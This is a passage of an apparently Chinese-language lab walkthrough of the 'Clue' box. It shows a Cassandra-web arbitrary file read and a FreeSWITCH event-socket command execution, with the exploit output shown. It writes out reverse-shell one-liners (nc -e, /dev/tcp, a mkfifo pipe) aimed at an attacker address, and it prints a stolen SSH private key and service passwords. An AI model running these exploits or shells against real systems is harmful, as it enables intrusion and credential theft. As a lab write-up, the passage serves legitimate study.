class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">_apt<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">100</span><span class="punctuation">:</span><span class="number">65534</span><span class="punctuation">:</span><span class="punctuation">:</span>/nonexistent<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">systemd-timesync<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">101</span><span class="punctuation">:</span><span class="number">102</span><span class="punctuation">:</span>systemd Time Synchronization<span class="punctuation">,</span><span class="punctuation">,</span><span class="punctuation">,</span><span class="punctuation">:</span>/run/systemd<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">systemd-network<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">102</span><span class="punctuation">:</span><span class="number">103</span><span class="punctuation">:</span>systemd Network Management<span class="punctuation">,</span><span class="punctuation">,</span><span class="punctuation">,</span><span class="punctuation">:</span>/run/systemd<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">systemd-resolve<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">103</span><span class="punctuation">:</span><span class="number">104</span><span class="punctuation">:</span>systemd Resolver<span class="punctuation">,</span><span class="punctuation">,</span><span class="punctuation">,</span><span class="punctuation">:</span>/run/systemd<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">messagebus<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">104</span><span class="punctuation">:</span><span class="number">110</span><span class="punctuation">:</span><span class="punctuation">:</span>/nonexistent<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">sshd<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">105</span><span class="punctuation">:</span><span class="number">65534</span><span class="punctuation">:</span><span class="punctuation">:</span>/run/sshd<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">systemd-coredump<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">999</span><span class="punctuation">:</span><span class="number">999</span><span class="punctuation">:</span>systemd Core Dumper<span class="punctuation">:</span>/<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">ntp<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">106</span><span class="punctuation">:</span><span class="number">113</span><span class="punctuation">:</span><span class="punctuation">:</span>/nonexistent<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">cassandra<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">107</span><span class="punctuation">:</span><span class="number">114</span><span class="punctuation">:</span>Cassandra database<span class="punctuation">,</span><span class="punctuation">,</span><span class="punctuation">,</span><span class="punctuation">:</span>/var/lib/cassandra<span class="punctuation">:</span>/usr/sbin/nologin</span><br><span class="line">cassie<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">1000</span><span class="punctuation">:</span><span class="number">1000</span><span class="punctuation">:</span><span class="punctuation">:</span>/home/cassie<span class="punctuation">:</span>/bin/bash</span><br><span class="line">freeswitch<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">998</span><span class="punctuation">:</span><span class="number">998</span><span class="punctuation">:</span>FreeSWITCH<span class="punctuation">:</span>/var/lib/freeswitch<span class="punctuation">:</span>/bin/<span class="literal"><span class="keyword">false</span></span></span><br><span class="line">anthony<span class="punctuation">:</span>x<span class="punctuation">:</span><span class="number">1001</span><span class="punctuation">:</span><span class="number">1001</span><span class="punctuation">:</span><span class="punctuation">:</span>/home/anthony<span class="punctuation">:</span>/bin/bash</span><br></pre></td></tr></table></figure>

<p>第一想法是是否可以读取某个用户的私钥信息，但是发现都读不到，唯一可以读取到的就是cassie&#x2F;.ssh&#x2F;known_hosts</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">python <span class="number">49362.</span>py <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> /home/cassie/.ssh/id_rsa</span><br><span class="line">Failed to read /home/cassie/.ssh/id_rsa (bad path?)</span><br><span class="line"></span><br><span class="line">python <span class="number">49362.</span>py <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> /home/anthony/.ssh/id_rsa</span><br><span class="line">Failed to read /home/anthony/.ssh/id_rsa (bad path?)</span><br><span class="line"></span><br><span class="line">python <span class="number">49362.</span>py <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> /root/.ssh/id_rsa</span><br><span class="line">Failed to read /root/.ssh/id_rsa (bad path?)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">python <span class="number">49362.</span>py <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> /home/cassie/.ssh/known_hosts</span><br><span class="line">|<span class="number">1</span>|cl0mW7klh2+eUO1GAszDa6SDpRI=|jSUa2FlglH9H3qUYQbfvLix8ino= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCpAb2jUKovAahxmPX9l95Pq9YWgXfIgDJw0obIpOjOkdP3b0ukm/mrTNgX2lg1mQBMlS3lzmQmxeyHGg9+xuJA=</span><br></pre></td></tr></table></figure>

<p>然后想到可以试下读取freeswitch的密码，搜索默认密码的存储位置是&#x2F;usr&#x2F;local&#x2F;freeswitch&#x2F;conf&#x2F;autoload_configs&#x2F;xml_rpc.conf.xml， 但是仍没有读到信息</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python <span class="number">49362.</span>py <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> /usr/local/freeswitch/conf/autoload_configs/xml_rpc.conf.xml</span><br><span class="line">Failed to read /usr/local/freeswitch/conf/autoload_configs/xml_rpc.conf.xml (bad path?)</span><br></pre></td></tr></table></figure>

<p>然后又尝试读crontab等其他文件，没有什么可以利用的方式。看一下当前进程，但是当时账号和密码被我忽略了，没有细看，只扫到执行了cassandra-web命令</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python <span class="number">49362.</span>py <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> /proc/self/cmdline</span><br><span class="line"></span><br><span class="line">/usr/bin/ruby2<span class="number">.5</span>/usr/local/bin/cassandra-web-ucassie-pSecondBiteTheApple330</span><br></pre></td></tr></table></figure>

<p>单纯文件读取无法执行命令，读不到敏感信息，没法拿下机器，还是需要寄希望于freeswtich 命令执行漏洞。</p>
<p>再检查了一遍backup文件夹，看是不是能找到有用的信息，是不是可能有密码，使用smbclient一个个检查效率太低, 直接把远程smb挂载到本地</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo mount.cifs <span class="comment">//192.168.166.240/backup ./backup -o guest</span></span><br></pre></td></tr></table></figure>

<p>在vscode中打开，搜索pass, 找到密码确实是ClueCon, 然后我测试了所有搜索pass找到的疑似的密码，全部都invalid。</p>
<p><img data-src="https://thiiiiink.com/202508/asynccode-40.png.png"></p>
<h2 id="File-Read-Cmd-Execute"><a href="#File-Read-Cmd-Execute" class="headerlink" title="File Read &amp; Cmd Execute"></a>File Read &amp; Cmd Execute</h2><p>后来突然想到，在任意文件读取的时候不知道有哪些文件，所以没法找到有效信息，backup里就有文件的路径。</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">python <span class="number">49362.</span>py <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> /etc/freeswitch/autoload_configs/event_socket.conf.xml</span><br><span class="line"></span><br><span class="line">&lt;configuration name=<span class="string">&quot;event_socket.conf&quot;</span> description=<span class="string">&quot;Socket Client&quot;</span>&gt;</span><br><span class="line">  &lt;settings&gt;</span><br><span class="line">    &lt;param name=<span class="string">&quot;nat-map&quot;</span> value=<span class="string">&quot;false&quot;</span>/&gt;</span><br><span class="line">    &lt;param name=<span class="string">&quot;listen-ip&quot;</span> value=<span class="string">&quot;0.0.0.0&quot;</span>/&gt;</span><br><span class="line">    &lt;param name=<span class="string">&quot;listen-port&quot;</span> value=<span class="string">&quot;8021&quot;</span>/&gt;</span><br><span class="line">    &lt;param name=<span class="string">&quot;password&quot;</span> value=<span class="string">&quot;StrongClueConEight021&quot;</span>/&gt;</span><br><span class="line">  &lt;/settings&gt;</span><br><span class="line">&lt;/configuration&gt;</span><br></pre></td></tr></table></figure>

<p>果然读到了服务器上的密码</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">python exploit.py --target <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span></span><br><span class="line"></span><br><span class="line">StrongClueConEight021</span><br><span class="line">b&#x27;Content-Type<span class="punctuation">:</span> auth/request\n\n&#x27;</span><br><span class="line">Authenticated - <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span><span class="punctuation">:</span><span class="number">8021</span></span><br><span class="line">Command executed successfully - <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span></span><br><span class="line">VULNERABLE USER<span class="punctuation">:</span> freeswitch</span><br><span class="line"># id</span><br><span class="line">StrongClueConEight021</span><br><span class="line">b&#x27;Content-Type<span class="punctuation">:</span> auth/request\n\n&#x27;</span><br><span class="line">Authenticated - <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span><span class="punctuation">:</span><span class="number">8021</span></span><br><span class="line">Content-Type<span class="punctuation">:</span> api/response</span><br><span class="line">Content-Length<span class="punctuation">:</span> <span class="number">63</span></span><br><span class="line"></span><br><span class="line">uid=<span class="number">998</span>(freeswitch) gid=<span class="number">998</span>(freeswitch) groups=<span class="number">998</span>(freeswitch)</span><br><span class="line"></span><br><span class="line"># whoami</span><br><span class="line">StrongClueConEight021</span><br><span class="line">b&#x27;Content-Type<span class="punctuation">:</span> auth/request\n\n&#x27;</span><br><span class="line">Authenticated - <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span><span class="punctuation">:</span><span class="number">8021</span></span><br><span class="line">Content-Type<span class="punctuation">:</span> api/response</span><br><span class="line">Content-Length<span class="punctuation">:</span> <span class="number">11</span></span><br><span class="line"></span><br><span class="line">freeswitch</span><br></pre></td></tr></table></figure>

<p>本地nc -nvlp 443， 反弹shell, 试了nc, busybox nc , python, bash -i &#x2F;tcp&#x2F;port 都不成功，并且确认网络是能ping通的</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"># which nc</span><br><span class="line">/usr/bin/nc</span><br><span class="line"></span><br><span class="line"># nc <span class="number">192.168</span><span class="number">.45</span><span class="number">.229</span> <span class="number">443</span> -e /bin/bash</span><br><span class="line">Error<span class="punctuation">:</span> timed out</span><br><span class="line">#</span><br><span class="line"># /usr/bin/nc <span class="number">192.168</span><span class="number">.45</span><span class="number">.184</span> <span class="number">443</span> -e /bin/bash</span><br><span class="line">Error<span class="punctuation">:</span> timed out</span><br><span class="line"></span><br><span class="line"># sh -i &gt;&amp; /dev/tcp/<span class="number">192.168</span><span class="number">.45</span><span class="number">.184</span>/<span class="number">443</span> <span class="number">0</span>&gt;&amp;<span class="number">1</span></span><br><span class="line">-ERR no reply</span><br><span class="line"></span><br><span class="line"># rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i <span class="number">2</span>&gt;&amp;<span class="number">1</span>|nc <span class="number">192.168</span><span class="number">.45</span><span class="number">.184</span> <span class="number">443</span> &gt;/tmp/f</span><br><span class="line">Error<span class="punctuation">:</span> timed out</span><br><span class="line"># busybox nc <span class="number">192.168</span><span class="number">.45</span><span class="number">.184</span> <span class="number">443</span> -e sh</span><br><span class="line">Error<span class="punctuation">:</span> timed out</span><br><span class="line"># which python</span><br><span class="line">/usr/bin/python</span><br><span class="line"></span><br><span class="line"># python -c &#x27;import pty; pty.spwan(<span class="string">&quot;bin/bash&quot;</span>)&#x27;</span><br><span class="line">-ERR no reply</span><br><span class="line"></span><br><span class="line"># ping <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> -c <span class="number">1</span></span><br><span class="line">StrongClueConEight021</span><br><span class="line">b&#x27;Content-Type<span class="punctuation">:</span> auth/request\n\n&#x27;</span><br><span class="line">Authenticated - <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span><span class="punctuation">:</span><span class="number">8021</span></span><br><span class="line">Content-Type<span class="punctuation">:</span> api/response</span><br><span class="line">Content-Length<span class="punctuation">:</span> <span class="number">275</span></span><br><span class="line"></span><br><span class="line">PING <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> (<span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span>) <span class="number">56</span>(<span class="number">84</span>) bytes of data.</span><br><span class="line"><span class="number">64</span> bytes from <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span><span class="punctuation">:</span> icmp_seq=<span class="number">1</span> ttl=<span class="number">64</span> time=<span class="number">0.017</span> ms</span><br><span class="line"></span><br><span class="line">--- <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> ping statistics ---</span><br><span class="line"><span class="number">1</span> packets transmitted<span class="punctuation">,</span> <span class="number">1</span> received<span class="punctuation">,</span> <span class="number">0</span>% packet loss<span class="punctuation">,</span> time <span class="number">0</span>ms</span><br><span class="line">rtt min/avg/max/mdev = <span class="number">0.017</span>/<span class="number">0.017</span>/<span class="number">0.017</span>/<span class="number">0.000</span> ms</span><br></pre></td></tr></table></figure>

<p>到&#x2F;home下看下两个目录下都有什么文件</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"># ls -al /home/cassie</span><br><span class="line">StrongClueConEight021</span><br><span class="line">b&#x27;Content-Type<span class="punctuation">:</span> auth/request\n\n&#x27;</span><br><span class="line">Authenticated - <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span><span class="punctuation">:</span><span class="number">8021</span></span><br><span class="line">Content-Type<span class="punctuation">:</span> api/response</span><br><span class="line">Content-Length<span class="punctuation">:</span> <span class="number">495</span></span><br><span class="line"></span><br><span class="line">total <span class="number">32</span></span><br><span class="line">drwxr-xr-x <span class="number">4</span> cassie cassie <span class="number">4096</span> Aug <span class="number">11</span>  <span class="number">2022</span> .</span><br><span class="line">drwxr-xr-x <span class="number">4</span> root   root   <span class="number">4096</span> Aug  <span class="number">5</span>  <span class="number">2022</span> ..</span><br><span class="line">lrwxrwxrwx <span class="number">1</span> root   root      <span class="number">9</span> Aug  <span class="number">5</span>  <span class="number">2022</span> .bash_history -&gt; /dev/<span class="literal"><span class="keyword">null</span></span></span><br><span class="line">-rw-r--r-- <span class="number">1</span> cassie cassie  <span class="number">220</span> Apr <span class="number">18</span>  <span class="number">2019</span> .bash_logout</span><br><span class="line">-rw-r--r-- <span class="number">1</span> cassie cassie <span class="number">3526</span> Apr <span class="number">18</span>  <span class="number">2019</span> .bashrc</span><br><span class="line">drwx------ <span class="number">3</span> cassie cassie <span class="number">4096</span> Aug <span class="number">11</span>  <span class="number">2022</span> .gnupg</span><br><span class="line">-rw------- <span class="number">1</span> cassie cassie <span class="number">1823</span> Aug <span class="number">11</span>  <span class="number">2022</span> id_rsa</span><br><span class="line">-rw-r--r-- <span class="number">1</span> cassie cassie  <span class="number">807</span> Apr <span class="number">18</span>  <span class="number">2019</span> .profile</span><br><span class="line">drwx------ <span class="number">2</span> cassie cassie <span class="number">4096</span> Aug <span class="number">11</span>  <span class="number">2022</span> .ssh</span><br><span class="line"></span><br><span class="line"># cat /home/cassie/id_rsa</span><br><span class="line">StrongClueConEight021</span><br><span class="line">b&#x27;Content-Type<span class="punctuation">:</span> auth/request\n\n&#x27;</span><br><span class="line">Authenticated - <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span><span class="punctuation">:</span><span class="number">8021</span></span><br><span class="line">Content-Type<span class="punctuation">:</span> api/response</span><br><span class="line">Content-Length<span class="punctuation">:</span> <span class="number">14</span></span><br><span class="line"></span><br><span class="line">-ERR no reply</span><br><span class="line"></span><br><span class="line"># ls -al /home/anthoy</span><br><span class="line">StrongClueConEight021</span><br><span class="line">b&#x27;Content-Type<span class="punctuation">:</span> auth/request\n\n&#x27;</span><br><span class="line">Authenticated - <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span><span class="punctuation">:</span><span class="number">8021</span></span><br><span class="line">Content-Type<span class="punctuation">:</span> api/response</span><br><span class="line">Content-Length<span class="punctuation">:</span> <span class="number">14</span></span><br><span class="line"></span><br><span class="line">-ERR no reply</span><br><span class="line"></span><br><span class="line"># cat /home/anthony/.bash_history</span><br><span class="line">StrongClueConEight021</span><br><span class="line">b&#x27;Content-Type<span class="punctuation">:</span> auth/request\n\n&#x27;</span><br><span class="line">Authenticated - <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span><span class="punctuation">:</span><span class="number">8021</span></span><br><span class="line">Content-Type<span class="punctuation">:</span> api/response</span><br><span class="line">Content-Length<span class="punctuation">:</span> <span class="number">14</span></span><br><span class="line"></span><br><span class="line">-ERR no reply</span><br><span class="line"></span><br><span class="line"># ls -al /home/anthony</span><br><span class="line">StrongClueConEight021</span><br><span class="line">b&#x27;Content-Type<span class="punctuation">:</span> auth/request\n\n&#x27;</span><br><span class="line">Authenticated - <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span><span class="punctuation">:</span><span class="number">8021</span></span><br><span class="line">Content-Type<span class="punctuation">:</span> api/response</span><br><span class="line">Content-Length<span class="punctuation">:</span> <span class="number">392</span></span><br><span class="line"></span><br><span class="line">total <span class="number">28</span></span><br><span class="line">drwxr-xr-x <span class="number">3</span> anthony anthony <span class="number">4096</span> Aug  <span class="number">5</span>  <span class="number">2022</span> .</span><br><span class="line">drwxr-xr-x <span class="number">4</span> root    root    <span class="number">4096</span> Aug  <span class="number">5</span>  <span class="number">2022</span> ..</span><br><span class="line">-rw------- <span class="number">1</span> anthony anthony  <span class="number">120</span> Aug  <span class="number">5</span>  <span class="number">2022</span> .bash_history</span><br><span class="line">-rw-r--r-- <span class="number">1</span> anthony anthony  <span class="number">220</span> Apr <span class="number">18</span>  <span class="number">2019</span> .bash_logout</span><br><span class="line">-rw-r--r-- <span class="number">1</span> anthony anthony <span class="number">3526</span> Apr <span class="number">18</span>  <span class="number">2019</span> .bashrc</span><br><span class="line">-rw-r--r-- <span class="number">1</span> anthony anthony  <span class="number">807</span> Apr <span class="number">18</span>  <span class="number">2019</span> .profile</span><br><span class="line">drwx------ <span class="number">2</span> anthony anthony <span class="number">4096</span> Aug  <span class="number">5</span>  <span class="number">2022</span> .ssh</span><br><span class="line"></span><br><span class="line"># cat /home/anthony/.bash_history</span><br><span class="line">StrongClueConEight021</span><br><span class="line">b&#x27;Content-Type<span class="punctuation">:</span> auth/request\n\n&#x27;</span><br><span class="line">Authenticated - <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span><span class="punctuation">:</span><span class="number">8021</span></span><br><span class="line">Content-Type<span class="punctuation">:</span> api/response</span><br><span class="line">Content-Length<span class="punctuation">:</span> <span class="number">14</span></span><br><span class="line"></span><br><span class="line">-ERR no reply</span><br></pre></td></tr></table></figure>

<p>&#x2F;home&#x2F;cassie下有个私钥文件，直接读取没有任何返回，应该freeswitch没有权限</p>
<p>使用cassandra 任意文件读取漏洞读取到私钥文件，修改私钥权限600, ssh <a href="mailto:&#x63;&#x61;&#115;&#115;&#x61;&#110;&#100;&#x72;&#x61;&#64;&#x31;&#x39;&#x32;&#x2e;&#x31;&#x36;&#x38;&#x2e;&#x31;&#54;&#x36;&#x2e;&#50;&#52;&#x30;" rel="external nofollow noopener noreferrer" target="_blank">&#x63;&#x61;&#115;&#115;&#x61;&#110;&#100;&#x72;&#x61;&#64;&#x31;&#x39;&#x32;&#x2e;&#x31;&#x36;&#x38;&#x2e;&#x31;&#54;&#x36;&#x2e;&#50;&#52;&#x30;</a> -i id_rsa提示错误error in libcrypto</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">python <span class="number">49362.</span>py <span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> /home/cassie/id_rsa &gt; cassie_id_rsa</span><br><span class="line"></span><br><span class="line">cat cassie_id_rsa</span><br><span class="line"></span><br><span class="line">-----BEGIN OPENSSH PRIVATE KEY-----</span><br><span class="line">b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn</span><br><span class="line">NhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJe</span><br><span class="line">d19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdM</span><br><span class="line">jWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2m</span><br><span class="line">B6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhq</span><br><span class="line">gBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/</span><br><span class="line">DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9r</span><br><span class="line">acIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XE</span><br><span class="line">QIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+<span class="number">7</span>QJx265XSRUkOd22wOoBws</span><br><span class="line">mv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/<span class="number">9</span>qMrBuCs0xmlBvymscveVEhVpuNpK/RshP</span><br><span class="line">HUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+<span class="number">2</span>wsg7PJlitBM5Orj6r8</span><br><span class="line">UWkAp9uw12pR7jjkWS8+avLLHsh/<span class="number">8</span>NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9Y</span><br><span class="line">etSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6M</span><br><span class="line">mGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+i</span><br><span class="line">CbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+</span><br><span class="line"><span class="number">0</span>hu6jNH4YCYU3SGdwTDz/UJIh9/<span class="number">10</span>OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fG</span><br><span class="line">Y2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/<span class="number">2</span>C</span><br><span class="line">gX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCG</span><br><span class="line">krIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9b</span><br><span class="line">yyQzy+CLBRAAAAgQD7g2V+<span class="number">1</span>vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/Ys</span><br><span class="line">kBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvU</span><br><span class="line">DEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknN</span><br><span class="line">Q2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTU</span><br><span class="line">iw4liAQFFhimnpld+<span class="number">7</span>/<span class="number">8</span>EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj</span><br><span class="line"><span class="number">4</span>oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==</span><br><span class="line">-----END OPENSSH PRIVATE KEY-----</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ssh cassie@<span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> -i cassie_id_rsa</span><br><span class="line">Load key <span class="attr">&quot;cassie_id_rsa&quot;</span><span class="punctuation">:</span> error in libcrypto</span><br><span class="line">cassie@<span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span>&#x27;s password<span class="punctuation">:</span></span><br></pre></td></tr></table></figure>

<p>搜索一番后，是因为直接下载的私钥文件存在换行符不正确的问题（\r\n）， 在vscode中打开点击右下角的LF，更改成CRLF，重新登录，发现还是提示输入密码，然后又尝试了使用anthony账号也不正确</p>
